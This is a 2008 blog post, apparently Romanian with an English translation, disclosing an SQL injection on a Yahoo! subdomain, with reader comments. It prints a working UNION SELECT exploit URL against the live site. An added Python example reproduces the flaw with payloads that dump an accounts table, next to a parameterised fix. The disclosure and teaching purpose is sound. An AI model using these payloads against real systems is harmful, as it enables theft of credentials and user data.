Posted on December 8th, 2008
A company worth billions of dollars, which is supposed to employ only "good" programmers, programmers who do not leave security holes behind them across the Yahoo! site.
It is already known that there have been quite a few XSS bugs across *.yahoo.com, and that others still exist. But when it comes to SQL Injection in yahoo.com, to the privacy Yahoo! promises starting to wobble, and to the possibility of accessing the private information of yahoo.com's millions of users, it stops being funny.
Let's move on to the presentation of the vulnerability (found by Kenpachi and kw[3]rln @ hackersblog.org & rstcenter.com).
One of the pages vulnerable to SQL Injection: http://in.jagran.yahoo.com/article/index.php?choice=homepage_getnews&state=1&city=87%20union%20all%20select%201,concat_ws(0x203a20,version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
What do we see here? Information about the SQL server version and the user the queries are executed as:

A listing of the SQL users and their passwords:

And, obviously, much more.
Moreover, this SQL Injection can also be used as an XSS, in particular for session theft:

The bad part is that they still have not adopted a policy for acknowledging the bugs/vulnerabilities in their sites and the people who find them. If they dropped the pride they would only stand to gain; most people who find bugs in the Yahoo! site no longer disclose them precisely because of this. It would also lead to fewer unpleasant situations such as cracked / stolen accounts.
===========================================================
English version (the author's own translation):
A company worth billions of dollars which is supposed to have the best programmers, the kind of company that won't leave any security holes in the system. The Yahoo! system, that is!
XSS bugs are already yesterday's news when we talk about Yahoo!: they are all over the place on the *.yahoo.com subdomains.
But we are not talking here about minor XSS bugs. We mean serious business. We are talking about the kind of security flaw which exposes the privacy of millions of users of the "trustable" Yahoo! services.
We are talking about SQL Injection, one of the worst kinds of security breach.
We will present here the vulnerability found by Kenpachi and kw[3]rln @ hackersblog.org & rstcenter.com.
Here you have one of the pages vulnerable to SQL Injection: http://in.jagran.yahoo.com/article/index.php?choice=homepage_getnews&state=1&city=87%20union%20all%20select%201,concat_ws(0x203a20,version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
What do we find here? Information about the SQL server: its version and the current SQL user:

A list of SQL users and passwords:

And of course, much more information within an attacker's reach.
Moreover, this SQL Injection can be used as an XSS, especially for session hijacking:

The sad part is that Yahoo! didn't adopt any policy whatsoever regarding this kind of problem. They don't admit they have a problem, nor do they give any credit to those who find them.
Following in the footsteps of other sites, Yahoo! could learn to gain from this. The vast majority of those who find bugs don't disclose them anymore, precisely because Yahoo! is in total denial. By coming clean, Yahoo! would also reduce the number of hacked/stolen accounts and other shameful security breaches like the one we present here.
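The pattern behind this bug and its hardened form, as an added example that is not code from the page or from Yahoo!: the `city` parameter is either pasted into the SQL text, so the page's `87 union all select ...` payload appends rows from anywhere in the database, or it is type-checked and bound as a parameter. The table names, rows and the SQLite stand-in for MySQL (sqlite_version() instead of concat_ws(version(), user())) are all assumptions made up for the example.

```python
import sqlite3

# Constructed sample rows standing in for the news table behind the article
# page discussed above; table layout and column names are assumptions.
SAMPLE_NEWS = [(1, 87, "Local headline", "Body of article one"),
               (2, 12, "Another city", "Body of article two")]
# Constructed account rows (placeholder hash), to show what a UNION can reach.
SAMPLE_ACCOUNTS = [(1, "dbadmin", "<placeholder-hash>")]

# The page's payload, cut to three columns to match this toy query
# (the original used 18 columns and MySQL's concat_ws/version()/user()).
PAYLOAD_VERSION = "87 union all select 1, sqlite_version(), 'probe'"
# Same technique pointed at another table, as the page's user listing did.
PAYLOAD_ACCOUNTS = "87 union all select id, name, pw_hash from accounts"


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, city INTEGER, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE accounts (id INTEGER, name TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?, ?)", SAMPLE_NEWS)
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ACCOUNTS)
    return conn


def vulnerable_lookup(conn, city):
    """The bug pattern: the request parameter is pasted into the SQL text."""
    sql = "SELECT id, title, body FROM news WHERE city = " + city
    return conn.execute(sql).fetchall()


def safe_lookup(conn, city):
    """Hardened form: reject non-numeric input, then bind it as a parameter."""
    if not city.isdigit():
        raise ValueError("city must be a decimal integer")
    sql = "SELECT id, title, body FROM news WHERE city = ?"
    return conn.execute(sql, (int(city),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # The vulnerable query returns the article plus the appended account row.
    print("vulnerable:", vulnerable_lookup(db, PAYLOAD_ACCOUNTS))
    try:
        safe_lookup(db, PAYLOAD_ACCOUNTS)
    except ValueError as exc:
        print("hardened:", exc)
```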

December 8th, 2008 at 1:32 am
And to think I pay them $19/year, it gives me the creeps... :)
December 8th, 2008 at 3:50 am
Were the ones who hacked it Romanians?
December 8th, 2008 at 11:51 am
@Aiurea
Yes. The two are part of the blog's editorial team and are admins on rstcenter.com.
December 8th, 2008 at 9:18 pm
Yeah, losers. What can I say, their pride is eating at them. They'd do better to admit it and fix it, for the users' safety. Congratulations once again to Kenpachi and kw3rln.
December 9th, 2008 at 5:14 pm
fixed, no thanks, no screwing us over. we'll post more, no problem.
December 10th, 2008 at 1:39 am
are you stupid? :O :) .. do you have any idea how much those are worth? go to gugle or microsoft and tell them to make you an offer :)
December 20th, 2008 at 1:24 pm
hehe I just found one myself on another yahoo site
January 21st, 2009 at 11:18 pm
[...] given that, some databases will be compromised. Because, let's be serious, it doesn't matter how big you are (yes, I'm too lazy to look for other sources), holes will always be found in your system [...]